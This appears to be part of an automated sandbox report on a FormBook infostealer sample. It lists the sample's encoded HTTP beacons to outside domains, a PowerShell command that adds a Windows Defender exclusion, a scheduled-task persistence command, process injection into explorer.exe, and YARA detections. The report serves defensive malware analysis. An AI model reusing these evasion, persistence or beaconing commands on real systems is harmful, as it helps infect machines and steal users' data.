                                            Location: https://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ngg2DCxHyWdHCXK0qgT%2Fa3%2Bm%2FYtqmG%2F9iEyO3FQ5JEPbD7Xr7ssk1bZaOLRNXkbYFzaeZv%2Fc0jfh9cIJoMzcws%2FjFgr2Wr36hCnXGjq50WhiMn5NSYSmW7je%2F8SZPq1zUlQ6xutJCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 6ab6ddd1fcd05c7a-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            6 | 192.168.2.7 | 49848 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Nov 9, 2021 12:58:02.526216030 CET | 5432 | OUT | GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.yungbredda.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:58:02.641443968 CET | 5433 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Tue, 09 Nov 2021 11:58:02 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6182ac26-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            7 | 192.168.2.7 | 49851 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Nov 9, 2021 12:58:13.562832117 CET | 5442 | OUT | GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1
                                            Host: www.mattlambert.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 9, 2021 12:58:13.678078890 CET | 5442 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Tue, 09 Nov 2021 11:58:13 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6185407c-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Code Manipulations

                                            Statistics

                                            Behavior


                                            System Behavior

                                            Start time:12:56:02
                                            Start date:09/11/2021
                                            Path:C:\Users\user\Desktop\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\vbc.exe"
                                            Imagebase:0x6f0000
                                            File size:368640 bytes
                                            MD5 hash:C4A1BDD685E346B7604F93357A922875
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low
                                            Start time:12:56:05
                                            Start date:09/11/2021
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe"
                                            Imagebase:0x1110000
                                            File size:430592 bytes
                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high
                                            Start time:12:56:06
                                            Start date:09/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff774ee0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Start time:12:56:06
                                            Start date:09/11/2021
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp"
                                            Imagebase:0xc00000
                                            File size:185856 bytes
                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Start time:12:56:07
                                            Start date:09/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff774ee0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Start time:12:56:08
                                            Start date:09/11/2021
                                            Path:C:\Users\user\Desktop\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\vbc.exe
                                            Imagebase:0x7ff6e70f0000
                                            File size:368640 bytes
                                            MD5 hash:C4A1BDD685E346B7604F93357A922875
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low
                                            Start time:12:56:11
                                            Start date:09/11/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff662bf0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high
                                            Start time:12:56:45
                                            Start date:09/11/2021
                                            Path:C:\Windows\SysWOW64\help.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\help.exe
                                            Imagebase:0x120000
                                            File size:10240 bytes
                                            MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Disassembly

                                            Code Analysis